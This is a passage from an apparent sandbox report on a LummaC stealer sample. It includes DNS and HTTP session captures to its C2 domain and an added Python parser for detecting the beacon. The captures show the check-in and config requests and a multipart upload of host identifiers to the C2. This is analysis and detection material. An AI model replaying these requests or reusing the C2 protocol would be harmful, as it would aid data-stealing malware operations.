Jul 25, 2024 06:32:23.805284023 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.805320024 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.805419922 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.805444002 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.805540085 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.805572033 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.805680037 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.805720091 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.805834055 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.805876017 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.806005955 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.806035042 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.806050062 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.806184053 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.806215048 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.815197945 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.815399885 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.815454960 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.815476894 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.815496922 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.815599918 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.815634012 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.815915108 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.816065073 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.816117048 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.816123962 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.856499910 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:27.373853922 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:27.373950958 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:27.374123096 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:27.374403954 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:27.374427080 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 06:32:14.245872021 CEST | 64356 | 53 | 192.168.2.5 | 1.1.1.1
Jul 25, 2024 06:32:14.258580923 CEST | 53 | 64356 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 06:32:14.245872021 CEST | 192.168.2.5 | 1.1.1.1 | 0x3fb | Standard query (0) | resergvearyinitiani.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 06:32:14.258580923 CEST | 1.1.1.1 | 192.168.2.5 | 0x3fb | No error (0) | resergvearyinitiani.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 06:32:14.258580923 CEST | 1.1.1.1 | 192.168.2.5 | 0x3fb | No error (0) | resergvearyinitiani.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Note: both answers are Cloudflare addresses, and the HTTP responses below carry Server: cloudflare and CF-RAY headers, so the C2 sits behind Cloudflare's proxy. The domain is the indicator to block; the two IPs are shared edge addresses and blocking them alone would also affect unrelated Cloudflare-fronted sites. The sample only ever contacted 188.114.97.3, the first answer.
                      • resergvearyinitiani.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | 4424 | C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-25 04:32:14 UTC | 271 | OUT | POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: resergvearyinitiani.shop
2024-07-25 04:32:14 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                      Data Ascii: act=life
2024-07-25 04:32:15 UTC | 818 | IN | HTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=t8d2o6mmgaa5ctjbatt1rmmu35; expires=Sun, 17-Nov-2024 22:18:54 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u6GWI97PI3y51KV6fl5CS%2Fv7W0QsLW8Q83EZt4Wdts5xxFsOn5ichBCSyxbY3cXdi7QNv2Z%2Bf%2FI%2BDQaMvreylCpKqHYI5KE%2FGLFH8F6auHZm3HwDur%2BRgJkA6Jqa%2FE9zMsjtvF68O860m3A%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896ccd5f26c431-EWR
                      alt-svc: h3=":443"; ma=86400
2024-07-25 04:32:15 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                      Data Ascii: 2ok
2024-07-25 04:32:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0
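Session 0 above is the whole LummaC check-in: a POST to /api with the form body act=life (8 bytes), answered with a chunked body that decodes to "ok". Session 1, which follows, uses the same endpoint with act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default and gets back a long base64-looking blob (the configuration the report's "Found malware configuration" signature refers to; no key for it is on this page, so the code below does not try to decode it). The script is an added example, not part of the Joe Sandbox report: it rebuilds both requests and the session-0 reply from the hex and headers the report prints, parses the beacon fields, and decodes the chunked body. The set of recognised act values is only the two this capture contains, and the lid value is simply the one stable string in the beacon, which makes it the natural pivot for hunting across samples.

```python
"""Parser for the LummaC C2 exchanges shown in sessions 0 and 1: a POST /api
whose form-encoded act= field selects the action, answered with a chunked
HTTP body. Example code added here, not part of the Joe Sandbox report; the
request and response bytes are constructed from the hex the report prints."""
from urllib.parse import parse_qs

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
LUMMA_ACTIONS = {"life", "recive_message"}   # only the actions seen in this capture


def build_request(body: bytes) -> bytes:
    """Reassemble the request exactly as the report shows it (headers + body)."""
    head = (f"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"User-Agent: {UA}\r\nContent-Length: {len(body)}\r\n"
            f"Host: resergvearyinitiani.shop\r\n\r\n")
    return head.encode("ascii") + body


# Constructed from session 0 (act=life) and session 1 (act=recive_message...).
REQUEST_CHECKIN = build_request(bytes.fromhex("61 63 74 3d 6c 69 66 65"))
REQUEST_CONFIG = build_request(b"act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default")
# Session 0 reply body: chunk "2\r\nok\r\n" followed by the terminating "0\r\n\r\n".
RESPONSE_CHUNKED = bytes.fromhex("32 0d 0a 6f 6b 0d 0a") + bytes.fromhex("30 0d 0a 0d 0a")


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return method, path, headers, body[:length]


def classify(raw: bytes) -> dict:
    """Extract act/ver/lid/j and decide whether the request has the beacon
    shape seen here: POST /api, form-encoded, act in the observed set."""
    method, path, headers, body = parse_http_request(raw)
    result = {"lumma": False, "host": headers.get("host"),
              "act": None, "ver": None, "lid": None, "j": None}
    if method != "POST" or path != "/api":
        return result
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return result
    fields = {k: v[0] for k, v in
              parse_qs(body.decode("ascii", "replace"), keep_blank_values=True).items()}
    for key in ("act", "ver", "lid", "j"):
        result[key] = fields.get(key)
    result["lumma"] = result["act"] in LUMMA_ACTIONS
    return result


def decode_chunked(data: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; raises on malformed input."""
    out = bytearray()
    pos = 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)   # chunk-size, extensions ignored
        pos = end + 2
        if size == 0:
            return bytes(out)
        chunk = data[pos:pos + size]
        if len(chunk) != size or data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated or malformed chunk")
        out += chunk
        pos += size + 2


if __name__ == "__main__":
    for req in (REQUEST_CHECKIN, REQUEST_CONFIG):
        print(classify(req))
    print(decode_chunked(RESPONSE_CHUNKED))
```

The shape check deliberately requires all three of method, path and content type before it looks at act=, because a form POST to /api is common enough on legitimate sites that matching on the body alone would be noisy; the JA3 and "Chrome/119" User-Agent in the capture are generic and are not used as features.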


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | 4424 | C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-25 04:32:15 UTC | 272 | OUT | POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 61
                      Host: resergvearyinitiani.shop
2024-07-25 04:32:15 UTC | 61 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74
                      Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
2024-07-25 04:32:16 UTC | 814 | IN | HTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=m03j3omhsnh4iaubfgklnjj6lt; expires=Sun, 17-Nov-2024 22:18:55 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9P%2BENcxdAB2OHHBE2%2FWUc6H6MfyNzH9MVunreKSHE8OMsw9UKuc%2BdpMuEslmiarxKvWdgl8T52MWjtbIQEB4coqUXMY6OLEVPEc5LVi%2BRWukP%2F3QqThN3xtCEtGqXeitlY2jZdeEBCZO3ek%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896cd31e88420d-EWR
                      alt-svc: h3=":443"; ma=86400
2024-07-25 04:32:16 UTC | 555 | IN | Data Raw: 34 65 31 0d 0a 67 4f 64 44 55 4a 65 6f 51 41 55 2f 36 61 6c 30 61 35 6b 32 4d 59 63 59 69 51 41 45 30 54 58 4a 44 45 38 47 31 69 69 6f 66 51 6e 37 78 54 56 79 72 5a 78 73 4a 30 79 4d 69 30 34 66 36 30 4e 55 71 7a 72 6f 5a 43 62 72 55 36 68 67 50 47 50 36 43 74 34 51 4b 37 71 42 49 6a 7a 6b 7a 57 77 6e 57 70 47 4c 54 6a 44 69 46 46 54 70 4f 72 4d 69 59 62 74 58 71 47 41 74 5a 37 31 48 32 42 46 71 36 49 73 6b 4f 50 4c 4c 4a 47 52 54 68 4d 77 52 44 76 68 63 58 2b 35 31 34 57 30 6d 2f 52 65 73 64 6d 30 38 39 47 58 4e 43 57 6a 4e 68 6a 41 37 74 64 56 73 66 68 32 4d 78 31 5a 52 75 31 64 55 35 58 54 76 5a 47 2b 35 58 61 46 6f 4c 47 4b 38 57 4d 45 62 59 65 69 46 4a 7a 6e 34 77 6a 42 70 57 59 50 48 46 77 54 34 46 42 32 6c 66 66 4d 69 50 76 4d 45 6d 57 30 38 64 61
                      Data Ascii: 4e1gOdDUJeoQAU/6al0a5k2MYcYiQAE0TXJDE8G1iiofQn7xTVyrZxsJ0yMi04f60NUqzroZCbrU6hgPGP6Ct4QK7qBIjzkzWwnWpGLTjDiFFTpOrMiYbtXqGAtZ71H2BFq6IskOPLLJGRThMwRDvhcX+514W0m/Resdm089GXNCWjNhjA7tdVsfh2Mx1ZRu1dU5XTvZG+5XaFoLGK8WMEbYeiFJzn4wjBpWYPHFwT4FB2lffMiPvMEmW08da
2024-07-25 04:32:16 UTC | 701 | IN | Data Raw: 72 6b 47 47 6a 77 78 78 51 78 2b 38 51 6c 63 52 32 55 68 51 39 4a 2f 46 67 54 76 54 72 6c 5a 32 6d 68 56 72 6c 72 49 33 61 34 54 38 77 53 61 4f 79 46 4a 44 58 34 78 43 52 67 58 6f 50 50 46 77 66 33 58 6c 44 68 65 61 73 73 4a 72 52 50 36 7a 5a 74 56 62 64 4f 7a 51 31 6f 37 4d 55 2b 66 4f 79 4b 4a 57 73 64 30 34 73 63 44 2f 5a 64 57 4f 4a 79 35 33 42 74 76 46 53 69 61 53 74 75 74 30 4c 41 47 57 58 6a 67 69 51 31 35 38 51 70 61 6c 36 42 7a 56 5a 48 75 31 4e 4c 70 53 4b 72 54 47 57 69 51 5a 6c 74 50 48 58 30 56 59 51 47 4b 2b 57 4a 59 57 71 31 77 79 70 6f 55 49 62 42 47 41 7a 32 58 56 4c 6b 64 2b 31 70 5a 37 74 66 72 32 6b 74 59 4c 6c 46 78 42 39 6c 36 6f 41 6c 4f 50 79 4b 62 43 64 61 6b 34 74 4f 53 63 74 5a 58 2b 35 32 71 56 64 6c 76 56 6d 73 65 47 31 37 2b
                      Data Ascii: rkGGjwxxQx+8QlcR2UhQ9J/FgTvTrlZ2mhVrlrI3a4T8wSaOyFJDX4xCRgXoPPFwf3XlDheassJrRP6zZtVbdOzQ1o7MU+fOyKJWsd04scD/ZdWOJy53BtvFSiaStut0LAGWXjgiQ158Qpal6BzVZHu1NLpSKrTGWiQZltPHX0VYQGK+WJYWq1wypoUIbBGAz2XVLkd+1pZ7tfr2ktYLlFxB9l6oAlOPyKbCdak4tOSctZX+52qVdlvVmseG17+
2024-07-25 04:32:16 UTC | 1369 | IN | Data Raw: 33 64 33 66 0d 0a 49 4c 5a 48 41 58 31 52 6c 37 76 66 2b 56 75 59 37 78 58 71 6d 38 6a 62 72 38 4b 68 46 39 73 2b 73 56 35 63 74 72 48 4d 6e 56 58 67 4e 70 55 50 50 68 61 58 65 4a 73 71 33 30 6f 71 68 65 73 59 6d 30 38 39 45 48 4d 45 32 66 69 67 7a 4d 38 2b 74 67 6f 64 56 6d 46 7a 78 6f 48 38 6c 6c 63 34 47 6a 76 59 6e 53 79 55 71 78 67 49 48 61 78 43 6f 52 66 62 50 72 46 65 58 4c 50 2f 69 56 33 54 49 79 4a 49 77 72 31 57 6c 54 7a 4f 76 51 73 66 2f 4e 51 70 79 35 31 4a 4c 64 47 78 78 5a 75 37 5a 63 72 50 76 54 59 4a 57 35 55 67 63 6f 59 42 76 42 59 56 76 64 78 35 47 70 70 73 6c 71 6d 5a 53 6c 6b 39 41 53 4b 47 48 4f 69 33 57 45 54 2b 4d 55 77 5a 45 7a 4a 2f 68 55 48 39 56 4e 46 70 57 57 6c 65 79 61 30 57 2b 73 32 62 57 57 34 52 73 73 51 62 65 69 4e 49 6a
                      Data Ascii: 3d3fILZHAX1Rl7vf+VuY7xXqm8jbr8KhF9s+sV5ctrHMnVXgNpUPPhaXeJsq30oqhesYm089EHME2figzM8+tgodVmFzxoH8llc4GjvYnSyUqxgIHaxCoRfbPrFeXLP/iV3TIyJIwr1WlTzOvQsf/NQpy51JLdGxxZu7ZcrPvTYJW5UgcoYBvBYVvdx5GppslqmZSlk9ASKGHOi3WET+MUwZEzJ/hUH9VNFpWWleya0W+s2bWW4RssQbeiNIj
                      2024-07-25 04:32:16 UTC1369INData Raw: 5a 31 43 41 78 52 67 41 39 31 78 66 34 6d 6a 6d 5a 32 36 35 58 71 35 69 49 47 65 6d 53 63 74 66 4a 61 4b 43 4f 58 4b 74 69 67 56 55 61 71 69 4c 43 55 66 69 46 46 54 70 4f 72 4d 69 5a 37 74 51 70 57 6f 2f 61 71 5a 45 7a 52 39 74 36 6f 30 6d 50 76 76 45 4d 47 39 63 69 38 55 5a 41 66 4a 51 55 75 46 2b 35 32 55 6d 2f 52 65 73 64 6d 30 38 39 47 4c 4a 42 58 47 67 71 79 6f 79 38 74 6f 30 66 42 32 55 68 51 39 4a 2f 46 67 54 76 54 72 76 61 57 79 36 56 4b 4a 71 49 47 53 39 52 63 4d 58 5a 75 71 58 49 44 6a 6e 7a 69 64 6d 55 6f 48 50 48 67 58 30 57 46 66 33 63 61 73 73 4a 72 52 50 36 7a 5a 74 52 4c 39 63 36 51 31 35 6f 70 70 76 4b 37 58 4e 4c 69 63 46 79 38 49 61 43 50 70 65 56 65 35 2f 35 6d 4a 6a 75 56 43 6e 62 69 31 6e 73 6b 7a 48 46 32 50 75 69 53 49 2f 38 4d 34
                      Data Ascii: Z1CAxRgA91xf4mjmZ265Xq5iIGemSctfJaKCOXKtigVUaqiLCUfiFFTpOrMiZ7tQpWo/aqZEzR9t6o0mPvvEMG9ci8UZAfJQUuF+52Um/Resdm089GLJBXGgqyoy8to0fB2UhQ9J/FgTvTrvaWy6VKJqIGS9RcMXZuqXIDjnzidmUoHPHgX0WFf3cassJrRP6zZtRL9c6Q15oppvK7XNLicFy8IaCPpeVe5/5mJjuVCnbi1nskzHF2PuiSI/8M4
                      2024-07-25 04:32:16 UTC1369INData Raw: 63 6f 51 42 66 59 55 48 61 56 39 38 79 49 2b 38 33 43 78 59 79 74 7a 70 58 2f 4e 48 7a 71 69 6d 6d 38 72 74 63 30 75 4a 77 58 4c 78 68 6f 44 39 6c 46 58 37 58 33 6f 59 32 71 33 57 71 5a 71 4a 47 43 78 57 4e 67 5a 5a 65 4b 4b 4c 7a 33 35 32 43 78 69 58 59 65 4c 57 45 6e 38 54 42 4f 39 4f 74 70 31 5a 76 4e 49 35 58 64 74 59 37 67 4b 6b 6c 39 6b 37 35 63 74 50 66 58 4c 49 57 4e 57 6a 4d 30 51 43 50 68 52 55 4f 42 38 36 6d 4a 71 75 56 43 6a 5a 43 4e 70 73 6b 37 4d 47 53 75 73 78 53 59 71 74 5a 4a 69 56 56 43 46 77 68 55 50 39 6b 4a 37 31 44 72 30 4c 48 2f 7a 55 4b 63 75 64 53 53 77 51 63 49 54 62 75 71 41 49 44 72 2f 77 69 31 6f 54 34 72 45 48 77 37 77 57 56 7a 72 66 2b 56 77 59 62 68 63 6f 32 63 6a 59 76 51 45 69 68 68 7a 6f 74 31 68 42 50 62 45 4b 58 5a 53
                      Data Ascii: coQBfYUHaV98yI+83CxYytzpX/NHzqimm8rtc0uJwXLxhoD9lFX7X3oY2q3WqZqJGCxWNgZZeKKLz352CxiXYeLWEn8TBO9Otp1ZvNI5XdtY7gKkl9k75ctPfXLIWNWjM0QCPhRUOB86mJquVCjZCNpsk7MGSusxSYqtZJiVVCFwhUP9kJ71Dr0LH/zUKcudSSwQcITbuqAIDr/wi1oT4rEHw7wWVzrf+VwYbhco2cjYvQEihhzot1hBPbEKXZS
                      2024-07-25 04:32:16 UTC1369INData Raw: 6a 30 46 42 32 6c 66 66 4d 69 50 76 4e 6d 76 57 6b 71 61 2f 5a 6a 7a 51 52 71 36 49 59 71 50 72 58 56 62 48 34 64 6a 4d 64 57 55 62 74 5a 58 2b 68 2b 2b 57 35 6d 73 31 36 73 5a 44 39 72 75 30 66 4a 48 32 37 77 68 44 4d 39 2f 73 38 68 59 31 4b 45 78 78 34 44 75 78 6f 54 34 6d 4b 72 4f 69 61 66 56 4c 70 6b 62 30 4f 75 58 4d 30 54 65 75 6d 49 4c 58 4c 71 68 44 73 6e 57 6f 65 4c 54 6b 6e 37 56 56 37 33 66 2b 70 6f 62 4c 35 66 70 47 73 6f 61 37 42 4f 77 52 46 35 37 49 6f 68 4e 50 37 4c 4a 32 52 57 67 63 55 66 47 37 73 61 45 2b 4a 69 71 7a 6f 6d 6d 55 79 71 59 79 45 6d 6d 6b 48 63 47 43 6e 44 69 79 6f 31 2b 64 78 69 65 42 4f 53 69 78 45 46 75 77 77 54 37 48 54 6e 59 57 47 37 58 36 35 75 4a 6d 53 37 51 4d 51 59 65 65 69 4a 4b 79 44 36 79 53 39 6a 55 49 48 4f 48
                      Data Ascii: j0FB2lffMiPvNmvWkqa/ZjzQRq6IYqPrXVbH4djMdWUbtZX+h++W5ms16sZD9ru0fJH27whDM9/s8hY1KExx4DuxoT4mKrOiafVLpkb0OuXM0TeumILXLqhDsnWoeLTkn7VV73f+pobL5fpGsoa7BOwRF57IohNP7LJ2RWgcUfG7saE+JiqzommUyqYyEmmkHcGCnDiyo1+dxieBOSixEFuwwT7HTnYWG7X65uJmS7QMQYeeiJKyD6yS9jUIHOH
                      2024-07-25 04:32:16 UTC1369INData Raw: 42 35 6a 71 6c 49 6d 47 72 46 2f 4d 75 48 32 36 33 52 74 77 53 5a 4b 4b 61 62 79 75 31 7a 53 34 6e 42 63 76 5a 42 41 6e 77 56 46 54 72 61 4f 70 71 61 62 6c 58 72 57 55 6e 5a 37 31 4f 78 42 5a 74 34 34 67 67 4d 2f 58 50 49 6d 35 50 68 6f 74 59 53 66 78 4d 45 37 30 36 33 47 35 74 67 6c 53 39 4c 6a 49 71 72 51 72 4e 45 79 75 36 78 53 41 67 2b 4d 49 6d 5a 31 43 4e 77 42 63 49 2b 46 52 54 35 6e 72 75 61 57 6d 31 55 4b 5a 6b 4a 47 32 6d 51 73 34 4e 61 2b 36 42 59 58 79 31 7a 54 6f 6e 42 63 76 37 46 51 4c 33 56 46 37 77 4f 76 51 73 66 2f 4e 51 70 79 35 31 4a 4c 78 42 77 52 6c 67 34 59 59 76 4f 66 2f 46 4c 57 31 62 6a 63 4d 54 43 66 64 55 56 75 4e 2b 37 32 78 68 76 56 71 71 66 43 35 74 39 41 53 4b 47 48 4f 69 33 57 45 53 2f 74 77 6e 59 45 76 4a 2f 68 55 48 39 56
                      Data Ascii: B5jqlImGrF/MuH263RtwSZKKabyu1zS4nBcvZBAnwVFTraOpqablXrWUnZ71OxBZt44ggM/XPIm5PhotYSfxME7063G5tglS9LjIqrQrNEyu6xSAg+MImZ1CNwBcI+FRT5nruaWm1UKZkJG2mQs4Na+6BYXy1zTonBcv7FQL3VF7wOvQsf/NQpy51JLxBwRlg4YYvOf/FLW1bjcMTCfdUVuN+72xhvVqqfC5t9ASKGHOi3WES/twnYEvJ/hUH9V
                      2024-07-25 04:32:16 UTC1369INData Raw: 70 53 4a 30 38 77 2f 72 4b 53 35 32 70 6b 7a 4a 43 57 69 6c 75 78 38 53 2f 73 59 68 61 31 79 4d 69 31 68 4a 39 42 51 4c 33 44 72 6f 63 48 54 38 52 72 31 6a 50 57 50 34 51 74 73 53 5a 36 4c 4c 59 58 37 78 77 53 35 69 57 70 75 45 42 42 6e 77 57 45 57 70 66 76 6b 69 4b 50 4e 47 6f 47 45 2f 61 72 4d 46 32 77 6c 6d 38 6f 59 6b 4e 62 6e 43 4d 32 70 52 79 34 56 57 48 50 42 59 56 65 68 76 70 48 4e 77 73 45 47 73 49 69 56 31 75 55 61 4b 49 43 57 69 6e 57 46 71 74 66 38 68 61 56 4f 4d 33 51 64 45 32 31 39 66 35 6e 62 71 5a 53 62 39 46 36 30 75 64 54 66 36 43 73 34 4f 4b 37 72 56 63 32 6d 67 6d 58 55 33 44 35 53 46 44 30 6e 74 46 41 75 33 4e 4b 74 77 4a 75 73 58 37 47 30 2f 64 72 4a 4a 33 42 77 73 33 4c 73 67 50 2f 71 47 4c 47 78 64 6a 4e 73 41 45 72 64 63 55 50 39
                      Data Ascii: pSJ08w/rKS52pkzJCWilux8S/sYha1yMi1hJ9BQL3DrocHT8Rr1jPWP4QtsSZ6LLYX7xwS5iWpuEBBnwWEWpfvkiKPNGoGE/arMF2wlm8oYkNbnCM2pRy4VWHPBYVehvpHNwsEGsIiV1uUaKICWinWFqtf8haVOM3QdE219f5nbqZSb9F60udTf6Cs4OK7rVc2mgmXU3D5SFD0ntFAu3NKtwJusX7G0/drJJ3Bws3LsgP/qGLGxdjNsAErdcUP9
                      2024-07-25 04:32:16 UTC1369INData Raw: 62 52 70 6c 56 6b 38 59 36 51 49 37 42 78 39 34 63 56 76 63 75 32 4b 65 69 64 38 67 64 73 62 42 76 77 55 54 4b 74 6a 71 33 51 6d 36 77 54 6c 4c 6a 38 6b 37 41 71 4e 45 57 62 6a 68 69 38 78 35 39 67 6b 5a 45 75 49 6a 43 67 33 33 6c 6c 65 34 48 54 73 58 46 69 53 58 62 74 6a 49 6d 50 32 61 73 30 4a 61 4e 79 37 46 69 50 79 32 6d 42 42 58 70 33 49 56 6b 65 37 54 42 4f 39 4f 73 70 6f 64 72 35 59 72 43 77 4e 59 36 4a 4a 69 67 41 6c 2b 38 55 33 63 71 32 5a 62 43 64 50 79 35 4e 57 54 76 68 47 51 65 4e 35 2f 57 45 68 6a 57 6d 47 66 43 70 30 74 77 6a 37 45 6d 2f 30 6b 43 49 69 38 76 51 63 53 6b 2b 4d 32 78 56 4c 79 6b 4a 51 35 58 54 73 49 69 6a 7a 54 2b 73 32 62 55 6d 6d 54 64 6f 63 4b 2f 33 4c 4f 48 4c 6a 69 6e 6f 30 45 38 76 5a 56 6c 47 37 45 31 33 6f 65 2b 68 73
                      Data Ascii: bRplVk8Y6QI7Bx94cVvcu2Keid8gdsbBvwUTKtjq3Qm6wTlLj8k7AqNEWbjhi8x59gkZEuIjCg33lle4HTsXFiSXbtjImP2as0JaNy7FiPy2mBBXp3IVke7TBO9Ospodr5YrCwNY6JJigAl+8U3cq2ZbCdPy5NWTvhGQeN5/WEhjWmGfCp0twj7Em/0kCIi8vQcSk+M2xVLykJQ5XTsIijzT+s2bUmmTdocK/3LOHLjino0E8vZVlG7E13oe+hs


                      Session ID:2
                      Source IP:192.168.2.5
                      Source Port:49706
                      Destination IP:188.114.97.3
                      Destination Port:443
                      PID:4424
                      Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-25 04:32:17 UTC | 290 | OUT | POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 13687
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:17 UTC | 13687 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:17 UTC | 818 | IN | HTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=42j83kf1dm1481fr41ag6djekn; expires=Sun, 17-Nov-2024 22:18:56 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
